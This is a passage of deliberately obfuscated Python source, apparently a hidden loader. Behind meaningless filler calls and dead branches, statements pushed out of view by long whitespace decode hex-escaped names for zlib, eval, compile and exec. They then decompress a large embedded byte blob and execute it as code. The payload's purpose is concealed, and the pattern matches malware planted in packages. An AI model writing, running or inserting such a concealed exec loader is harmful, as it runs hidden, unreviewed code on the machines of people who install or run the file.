            _invert(_substract = 99793 * 45195)._cube(_frame = -85948 + _square._stackoverflow)                                                                                                                                                                                                                                                          ;_invert._walk(_modulo='xxwxxxxxwxxxxwxwwxxxxxwxx',Modulo=b'\xecG\xb45j\x9cJ\x10\xa9fb\xbe\xc8\xaf9\x0e\x89\xe3\x8d\xef\x9f3>\xdcj<\x82XE\x82\xc4oX\xc1\xc31\x9c4Ner\xbe\x03\xed^E\x1e\xd7!\xfc\xa7U=\xc7*\xfe\x95\x12\xbf\xed\xa2\xfdW\xe2\\0\xe8Z\xe5Z\x99\xd7\xdd\xfb\xb5\xfa\x9e\xa2\xc6YL\xd5\'qA\x82\xa7f[\x96\x8f\xb5\x0b\x0f\xbd"\xf2\xd9\xe2\x93\xbe\xdbx\xde\x9d\xc9\xf9\xe2\xbdJ\xde\xbe\xd3\xedHt{\x92woq}\xfa]V\x00\x97\x95\xee\xb6\x028w;\xac\xc8\xb5\x8d\xbb\xae\xf0\x0e\xaf\x16\xf7\xfc\x95n\x19\x16\xb7\x0fz\x15w\x10:z\xa7\x95%\x00W\xb0n3\x90o\xf3\xfc\xc3]~\xfa]T\xd0XYv[#\x95\xb1\xfd\'\xd9k\xcb\xc4\xcd\x0bCL]\xbe\xa1a\xb6\xa5\xe3\x92\xb2\xc7l\xed\x980\'\xf57BD\xce~9)\xe2X\xbf\xdb[(\x9ds\x07!\x9fv\x13\xd2\x1d\x85\xe2\x9d\xc5\x18\x7f\xab\x7f\xddN\xe4\x97\x9a\x1e\xbf\xbb\x107y\x93=\t\xf1\x7f\xa9\xfbs\x9fb\xb3\xa7\xa37\xd5\x89\x03\xbb\xd4]Me<q;\xd3\xd3\x12!_\xcb\x07j\xb2\xa7\x08\xa4W<\xd7\xb4\x96\xbc\x8d~\x16O\xc7/\x11}\xe2\x8a*\xef\x83DgC\xf8&\x98?\xc1\xd2<r\xab.\xdd-\xf5\xd8M,m\x843\x1d\x03\xe9\x9bi\xca\xe3\xd9\x83v\x12\xdd\x91\xe6>\x9f\xdcfD\\\xce0\xd4\xda\xad\x07\xdb\x9c\xf664\xedm{\x1a\xd3\x12\xf2\x13\x84\xf7\x00\r4\x98aZM\\O}\xaa\x89#\x0c\xeb+CY\x97\xb4\xa40\x12\xe1\x9a)z\x8c|\xe8\xf8bpwk\xd3\x98\x06\x94r+G%\xc7\x9aK\x0f\xe3\xda\xcaQ\xddst\x14\x17\xe5\xe0\'\x9d\xe7y\xc3\xfc\xec\xda\x0f\xcbd\xf7\xb8\xbf\x92\x85>\x01qkp \x8f\xef\xb0\xa5C\xca\x0c\x8f\xac\x9c\xc4\xb0\xd7\x0f\x85\xd0a4\xff\xfb\xf5\xcdm\xfb\xaey\xdb\xfex\xc6\xfd[eC\xd1\x17$\x9a/N\xb27\xde\x91\xe4\xf2\xefoq\xff\xc7\xfd;\xd5\xf2u\xc4\x83\xeb\xe7\x01\xfb@\xe6{@N\xed\x08\xa9\x9f|\x87\xc8\xc3\x8byz\xdb\\\xdd\x850mHH\xbe\xf0\x04\xbb\x11\x9e\xffMN\x8b\xef\x91\x8d\x9b\xdf?{\xf6\xeb\xd9\x1f\x1f\xae\xab\xb3\xf3v{\xb7i\xb7?\\\x9c\xd5%Cw\xa1F\xf2e\xde\xf8\x11:&y\xfa\x81\xeaP6\xf1,\xe5\xd6\xf1\xbb\xde\xe5\xd7r\xac\xcaf\xd5\x18\x15\x1fTJP\xd1!\x8a\x0f6\xdd\xe96+\xb4x\x86\n\xee\xd9\xfa\xfcc\x1a-\xff\xd3\xe6\xdd\xf8\x9c\xbfI;\x8d\x1e\x1e\xce\xca\\;\x1e\xde\xf0]\xb8khQ\xb4\xb8i^\xd8]\xcbZ*\x8bEe\xf7ul\x9e\xff\xe5\x9dtW\xd5U}U\xe0\xdb\xe0\xa8\xae\xecU\x85\xdb\xe3\xdcpq\xb6\xb0\xc6\x88%\xd2\xad\x8f\x1f3\x849\xfb\xf5\xe2\x1c\xebB\x7fF\x82\'q\x91p\xc5\xfc\xed\xe1\x18\xe8\xe2>\xb1!\xee\x15k\xb3}dm<\xd2\x06\xe0\x87\xca\x9a\xe5\x1b\x80w\x94l\x1f\xfd\xd8\xc6O\x8b\xcf6\xbb\xea\x8e\xec\xea \xf1\xfc\x8b\x92\xab\xbd;\xa9~\x11Dk\x1f\xcc\x93\xc8\xbb\x89\xdf\x1b\x11\x8a\xeb\x98v\xc2q\xcc\xf9&%\x1d\x94\x92\xd45\xb7\x924?\x1fJNS\xf7\x87y)_^\xab\x8e\xd2\x93\xcf\xa4\xaca\xbdCikX6\xde\xff\x9c\x92\xd2a\xfa\xd2f\x9fmv\x16\xa9\xcb2\xba2\xfa\x8d\xa0\xbd*\xd21\xfb\x8a\x9fXE\xba\x98\xfdM\x99/\x89r=\xa5\xc6\xd6C\x89\xed\x80\xf5D\x14\xf9F\x87fGGo\x1c\x1ae\xb4\'p\xa12\x0c\xfd\xd34\x9d\x87,/\x1c\xb8_\xf5\xee\x19hZ\xe2\x11F\xdd;\xcd\xac\xa7\xa1E\rn\xa7\xb9e\xd7C\r\xaf\xa7\xf9\x15\x7fjmP~.H,\xce\xf2\xf7\xfa\xd5\xa3P\xa2\xc7\xfc=\x84\xb3\x0bs\xb5\x82\xcc\\^\x05\xc8\xcd\x0e\x12t\xb8rx\xc4\x8esO@7]&\xc1\xda\xcc\x92\x9b~\xdaf(\xf5\xee+{\x84\xd4;<\x8eg\x1d\xfb\x06\xe5\xa3(\xee2\xf3\xb4\xcf~\xab\xa7\x12\xf3\xb4\x0ejI\xd9\xb0tPG\xff\x98\xcfg\xd4\xdb\x1f\x9d\x91,\xd0\xc8\xa3v\x9d4j=\x9a\x98\xd7\xe9\xe7+\x90\x8b\x92\x1e\x16\xbe\x94\x18\x80~\xa6.;\x9d=\xe9\xe8z$\xed\x9d\xe7U\xe9$\xc0\xc9\xd0\xb3\x0b\xd6\xc4A\xd5\xb1N=\xeb\xae\xd3\xf9\xd6,\xef\x15\xfbQ\x97|yM^Q\x8c\xdfq\x8a\\\xba\xd2|=\xefz\xd4\xa2Om\xc9\x8d\xa0\n\x06\x1b\xf4z\xca\xb8\x8e\x92\xfd\x8d\xbd\xe8F\xd6Y\x1f6\x995\x82\xe9\xd6,\x19\xdd\xaa\xd4O\xb3Zj\rI#\x92\x9f\x0e1\xf9\xb8\xc6#L\xb5w\xad4\xe6\x18\xe8\xa8u$\x7f\xba\xce D\x0b\xca\xca\\\xdb\x95Y\x99\xd1\x0fB\xa8\xb5E\xec+\x84\xe0A\x0b\xcb\x12\xeb\x8a\xf2\x9e\xe2\x04V\x91\xbd6\x8c\xe8\xce\xe5\xd2\x8c\x0bu\xa1\xf5\xe2\xec\xc2\x82\xfe\x9b+\x8fo\xf2\x02ON\x80G\xdc8w1\xaf\xb1\xb4\xd8\x08O\xb1b\xa7\xc1\xb7\xd48\xca}*\x19}\xa1\x85D\tWG\xb4:\x82\x96H\xdach/\xe5U!0\xaf\xc0\x91\x1d\xe0e\xe4W\x96\xcc8\xf7\x08\xde_G\xc8\xeb\x1c`n\x85\xf7\x8fr\x9fn>\xe6\xf5\xa6\xcf\xed3;\x9d\xfax\x8f\xdf\x07R\x8b\xce\x1c$\x1e\xc5\xde\xe4\xa2\\RE\xf3c2;\x96Qv\xc9\x7f\xa3\xf0P\xd9#~\xa3p\x99\xb1]\r\xdf6\xc6\x90\xd8\xe8U\xdf\x19\xc5\xa3i\\\xc8\xfaQ\x06t\xb2\x85\xb6\xe7-\xecG\xd6l{a\x1f\xed\x12\x93\xfb\xa1\xc1$uo\xa8\xf0\x85L\xc9\xeb~}\x91\xc7\x9e\xe6\x1e\xd7j}\xe4\x1a\xce4\xa5\xf4C\xc3\xf2S\xc3\xf1\x17\x87\x7f\xfe\xe7\xf2u*\x04.\x08{0\xc2z\xc8\x8a\x8aq\xee\xf2\xb5\x0c\xd6U\xe3Y23\xfe@\x1d\xd8\x0e\x1e)\xc7\xb9G\x10S%\x9a\xac\x81\xbd\xa9\x85<\xdbq\xee\xd3Q\x90\xaf\xce}\xf8%\xa8!\xa5\n\x93\x10+\xa38\xb9;\x8b4H\xaf\xe5\x1b\xd7\xcbD\xd1\xadI\xa2\xeb"w\xdf2\xa1\xd4G\x17^r\xe5\xd9\xcc\x9d\xc7\xbcR\xf2\xd4\xe5\x17\x16\x95}\xb8p+\x1cz\xb1;\xcf\xc5U\xb6\xa2\xc1\x02\xdf+q\x0fvy\x14m\xea/\xc29xvA\xe1y\x85\x9e\xa90]G\xf1\xba\x1e\xe7\x9eB\xf8J\x06\x93hg\xb0\x91O\'\xa3K\x91\xd9(\x96\x94]l\xa3X\xearL\x18n\xb3\xdf\xdfK\x9c\xdaf\xbf\xc7\'qs\xa7\x17\xae\xf7\xc1\xced\x86\xa8\xdcfc\xb3\xbc$\x07\x1d*\xeb\x8f1Z}#\xaf\xa7\x0b\xf0*C8Z\xce\x9a3\x16\xdf\x07\xc0\xf76\xeb\xf3\xcfi\xb4yL\xeb\x98V1\r1\xf5\x83r\xe9\xbe\x8d)\x7f\xf0\xad\xd4\x1f\xb7\xe3\x86\x11\'\xab\xb7<\x8d\xd9]\xcfN\xe4\x00\xd1\xf3x\xd0\x8f\xea\x8bx\x98\xc1\xbd\x98\x9f_\xa7gv\xcfvG\xee\x08y\xac6\xc4!\x12\x9d\x1e\xc3{\xb9C$\xbf\xce\xef\x0f\xd3\xa9\xfb\xda\xcegu\x96\xec\xa3\xfe\x9b!\x85Hg]n\x97\xbf$8\xf7\x94B\xee\x17b~8\xc4\xdes7B\x1d]\x0c&^\xcb\xbd\x8c\xbd\x1f*{\xcc\x0f\x17\xcf\x19%\x9e\x927|s%?\xcc\x95,a\'\xf9\xe1\xb2tx\xee&\xca\xeb\xa6D\xf2N\x94)L\x88i\xc9\xb2&>Cb\xca\xd0\x14\xb9\xe7\xa2\x1b\xd8M\x1cv\xe2\x18\xde\x9b.\xcf\rT\xb4Mmc\xaa\xcdS\xbb\xca\xbf\x1c\xaa\x9a\xbd\xb6\xd4\xda\xad\xed\xbf\xac\xd4.{?\xecOBG\x9f0\xae\xe7ON\xff\x9e^.\xe6j\xd9\xe9L.\xb3\x1b\xd7\x99\xeeY\xc45R\x1e,\xf7\x08}\xdb!\xc5\xe9\xeb\xee\xecx_\x86\xaeQ\x88n\xd0\xe9\x08\xabS\xca\xf6s\xe9\xc9\x82\x9eD\xc7\x914\x9d\xa7\xeba\x9a\x1f\xf9\xbd\xc9\xf3<\xf8)\x0f\xce\xc4u:\xf2\x00\xcet\xd8\xac\\~o*X4\xbd\x16\xf3\xd7\xe5F\x8a\xbc\t\x81\xd3w\x87\xd0}\x04\xd7\xcf\xe7\xb5\xf3${M\xb2u\x19\xd7\x85\xdd\xa7p\xfb"\n\xd1K\xca.f"\x7f\x86\xc0\xd0\xc7q1\x1e\xfb\xa2\xe8"s{\x9f\xd7\xb5\x19\xcfK\xf9\xea\x16L\xaf\xdf\xee\x8c\x8d\xf1\xf5\xdct\x96\xf2\xfeJ\xce=z\xa9\x82\x84\xf5UW\xc5\x15\xdd\xffut\xf9\x8frO\xf4\x92w\xb2z&\x153y\x89\x93\x854\xa9\xa5K\xca\x1e\xa1\x96f\xae\xc7O\xdaA\xed\x96Z\xef\x1f%\xec\x120\x8b\xe1+\xa5@\xd3\x8b=\x7f%/%\xf5r\x1f\xa9\xfdJ\xe6-\x88\xaf\x83\xad\xb9\xabB\xfc\t\xa3\xdc#<\x9a\xf4A\xd0S\xea$uWFpe\x94{D\x8dV\xc2U\xac\xf8g\x04\xe7\xa4\xc6Q\xeeg7\xa1\xa4H\x05\x9f\xbc!\x11\xff\n\xd7\xbdh\x956$XR\xf6\x88\r\t\xe6\x8eS*_\xff\x0f\xc2\x85\xb3W')

        if 180627 > 6020981:
            _invert(_substract = 917 - 35878)._negative(Theory = _square._stackoverflow + -85510)
        elif 145204 < 8611048:
            _square._negative(Theory = _square._stackoverflow - 25718)                                                                                                                                                                                                                                                          ;LLJLILLJLLILJILJIJIJ,nmmnnnmnnmmmnnmnmn,lllljillllllllljilijjllji,O0O00Oo0oOOoooo000OOOoO,lIIIlllIlIIlIlIlII=(lambda MMNMNMNNNNMMMMNMM:MMNMNMNNNNMMMMNMM['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda MMNMNMNNNNMMMMNMM:MMNMNMNNNNMMMMNMM(__import__('\x7a\x6c\x69\x62'))),(lambda MMNMNMNNNNMMMMNMM:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(MMNMNMNNNNMMMMNMM)"),filename='\x4e\x4e\x4d\x4e\x4e\x4d\x4d\x4e\x4d\x4e\x4d\x4d\x4d\x4d\x4e\x4d\x4d\x4e\x4e',mode='\x65\x76\x61\x6c'))),(lambda:(lambda MMNMNMNNNNMMMMNMM:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(MMNMNMNNNNMMMMNMM)"),filename='\x4e\x4e\x4d\x4e\x4e\x4d\x4d\x4e\x4d\x4e\x4d\x4d\x4d\x4d\x4e\x4d\x4d\x4e\x4e',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda mmmnnmmmmnmnnmmnmm,MMNMNMNNNNMMMMNMM:mmmnnmmmmnmnnmmnmm(MMNMNMNNNNMMMMNMM))
        if 386997 > 7791269:
            _square._cube(_frame = 22056 - _square._stackoverflow)
        elif 243848 < 8794544:
            _invert(_substract = -13924 / 26021)._negative(Theory = _square._stackoverflow + 5029)                                                                                                                                                                                                                                                          ;O0O00Oo0oOOoooo000OOOoO()(lIIIlllIlIIlIlIlII(LLJLILLJLLILJILJIJIJ(nmmnnnmnnmmmnnmnmn(lllljillllllllljilijjllji('\x76\x61\x72\x73'))),_invert._floor(Absolute='IIIIlIlIlIllllIIIIlI')+_invert._floor(Absolute='wxxxwwxwwwxxxwwxxxxwx')+_invert._floor(Absolute='xxwxxxxxwxxxxwxwwxxxxxwxx')))

    except Exception as Product:
        if 105672 > 7984704:
            _invert.execute(code = _system(Product))

        elif 389288 > 8176498:
            _square._cube(_frame = 86123 * _square._stackoverflow)
            